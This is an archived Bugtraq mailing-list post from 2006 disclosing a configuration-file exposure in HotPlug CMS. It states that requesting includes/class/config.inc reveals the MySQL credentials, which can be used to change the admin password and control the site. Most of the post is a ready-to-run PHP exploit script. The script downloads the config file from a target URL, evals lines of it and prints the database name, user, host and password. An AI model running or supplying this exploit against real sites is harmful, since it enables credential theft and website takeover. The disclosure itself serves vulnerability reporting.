HotPlug CMS Config File Include Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: HotPlug CMS Config File Include Vulnerability
From: security@xxxxxxxxx
Date: 11 Sep 2006 15:38:59 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Hello

HotPlug CMS Config File Include Vulnerability

Discovered by : HACKERS PAL
Copyrights : HACKERS PAL
Website : WwW.SoQoR.NeT
Email : security@xxxxxxxxx

After Script Url Add
includes/class/config.inc

And you will download the config file ,, so that you will be able to connect by 
remote connect program to the mysql server and change admin password and be 
able to control the website..

And This is the exploit if you want :-

#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* HotPlug CMS Config File Include Vulnerability exploit
/*                 By : HACKERS PAL
/*                   WwW.SoQoR.NeT
*/
print_r('
/**********************************************/
/*   HotPlug CMS Config File Include Vul      */
/*   by HACKERS PAL <security@xxxxxxxxx>      */
/*       site: http://www.soqor.net           */');
if ($argc<2) {
print_r('
/* --                                         */
/* Usage: php '.$argv[0].' host             */
/* Example:                                   */
/* php '.$argv[0].' http://localhost/hot    */
/**********************************************/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

$url=$argv[1];
$exploit="/includes/class/config.inc";
$page=$url.$exploit;
         Function get_page($url)
         {

                  if(function_exists("file_get_contents"))
                  {

                       $contents = file_get_contents($url);

                          }
                          else
                          {
                              $fp=fopen("$url","r");
                              while($line=fread($fp,1024))
                              {
                               $contents=$contents.$line;
                              }


                                  }
                       return $contents;
         }

     $page = get_page($page);

     if(eregi("<?php",$page))
     {
        $lines = explode("\n",$page);

        $evaled = 
$lines[50].$lines[51].$lines[52].$lines[53].$lines[54].$lines[55].$lines[56].$lines[58].$lines[58].$lines[59];
        $evaled=str_replace("include","#include",$evaled);
        eval($evaled);


        Echo "\n[+] Database Name : $db_name";
        Echo "\n[+] Database User : $db_user";
        Echo "\n[+] Database Host : $db_host";
        Echo "\n[+] Database Pass : $db_password";
                                 Die("\n/* Visit us : WwW.SoQoR.NeT             
      */\n/**********************************************/");
             }
             else
             {
                Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT          
         */\n/**********************************************/");

                }
?>

WwW.SoQoR.NeT

Prev by Date: PayProCart <= 1146078425 Multiple Remote File Include Vulnerabilities
Next by Date: Re: [Full-disclosure] Re: RSA SecurID SID800 Token vulnerable by design
Previous by thread: PayProCart <= 1146078425 Multiple Remote File Include Vulnerabilities
Next by thread: PhpLinkExchange v1.0 RFI + RC + Xss [RC-exploit]
Index(es):
- Date
- Thread